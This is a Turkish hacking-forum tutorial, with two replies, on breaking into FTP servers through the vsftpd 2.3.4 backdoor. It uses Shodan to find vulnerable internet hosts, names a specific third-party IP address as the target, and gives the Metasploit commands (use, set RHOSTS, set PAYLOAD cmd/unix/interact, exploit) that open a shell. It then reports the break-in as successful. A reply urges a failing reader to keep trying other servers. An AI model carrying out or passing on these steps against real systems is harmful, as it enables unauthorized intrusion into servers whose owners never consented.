[+] vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | 21 Portuna Sızma İşlemi

OBT is HeRYerDe

Anka Team
11 Ara 2020
2,562
1,477
1183599.png
54pciyn.png



Hepinize Merhaba Değerli TurkHackTeam Üyeleri

Bu Gün Sizlerle vsftpd Üzerinden
21 Portuna Sızma İşlemini Öğreneceğiz,
Hemen Başlayalım.




YNY5Ak.png



VSFTPD Nedir?

vsftpd, Linux dahil Unix benzeri sistemler için bir FTP sunucusudur. Ubuntu, CentOS, Fedora, NimbleX, Slackware ve RHEL Linux dağıtımlarında varsayılan FTP sunucusudur. GNU Genel Kamu Lisansı altında lisanslanmıştır. IPv6, TLS ve FTPS'yi destekler.

p0htpda.png



1) Searchsploit


Öncelikle 'searchsploit' ile vsftpd Üzerinde Zafiyet Araştırması Yapıyoruz

* Terminali Açalım


komut: searchsploit vsftpd




mpzt98h.jpg




Gördüğünüz Gibi Bizim Sızma İşleminde Kullanacağımız Zafiyet Sürümünü Bulduk




2) Shodan Search Engine



shodan-logo.png


Shodan, kullanıcıların çeşitli filtreler kullanarak internete bağlı

çeşitli sunucu türlerini aramasını sağlayan bir arama motorudur.



* Shodan Search Engine



thdeeaf.jpg




URL'ye Girdikten Sonra 'search' Kısmına Şunu Yazıyoruz



komut:
vsftpd 2.3.4



Ardından Karşımıza Çeşitli Adresler Çıkacak, Bu Adreslerden Sadece 'Login successful' Yazanları Kullanacağız



dbfoy84.jpg




'
186.249.234.100' Adresini Kopyalayıp Terminalime Geri Dönüyorum




3) Metasploit



metasploit-framework-logo.svg




komut:


msfconsole



9fj130f.jpg




* Metasploit'e Geldikten Sonra '
vsftpd' Üzerinde Arama Yapıyoruz




komut:

search vsftpd



di9y2gf.jpg




* Gelen Bölümde Komutu Çalıştırarak Exploiti Seçmiş Ve Gerekli Ayarları Görüntülemiş Olacağız



komut1:


use 0

komut2:

show options



s3aw4ay.jpg




* Bu Kısımda '
RHOSTS' Bölümünün Boş Olduğunu Göreceksiniz, Buraya Kopyalamış Olduğumuz Adresi Tanımlamalıyız



komut:


set RHOSTS 186.249.234.100



Ardından PAYLOAD Seçmemiz Gerekli



komut:

show payloads



Gelen Bölümden PAYLOAD'ımızı Tanımlayalım



komut:


set PAYLOAD payload/cmd/unix/interact



* Buraya Kadar Geldik, Sadece Çalıştırmak Kaldı. Bunun İçin Komutu Çalıştıralım



[Diğer Adreste Sorun Çıktığı İçin Başka Bir Tane Denedim Siz Devam Edebilirsiniz]



komut:


exploit



k82hhx9.jpg




* Gördüğünüz Üzere Sızma İşlemi Başarılı Oldu, 'help' Komutunu Kullanarak Yapabileceğimiz Şeylere Bakabiliriz



YNY5Ak.png




- İyi Forumlar Dilerim



ovca0xc.gif


af8mqjc.gif
 
Son düzenleme:
22 Mar 2018
245
16
Exploit completed, but no session was created denedimde olan olay bu bire bir aynısını yapsamda knkim nasıl çözücem bunu
 
Moderatör tarafında düzenlendi:

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,053
388
Ankara
Exploit completed, but no session was created denedimde olan olay bu bire bir aynısını yapsamda knkim nasıl çözücem bunu
Bu makaleyi okuduktan sonra exploit'i de araştırmıştım sigara içmeye gitmeden önce.

Asıl konu olarak açtığın soruna verdiğim cevabı boşver, buradan cevaplandırayım.

Zamanında bu vsftpd sunucusunun 2.3.4 versiyonunu elemanın teki, bile bile backdoor ile yüklüyor. Tabii hızlıca bulup patch ediyorlar. Her bulduğun sunucuda açık olması söz konusu değil. Patch edilmiş versiyonu indirmiş veya sonradan patch etmiş olabilirler.

Ne yazık ki denemeye devam edeceksin.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.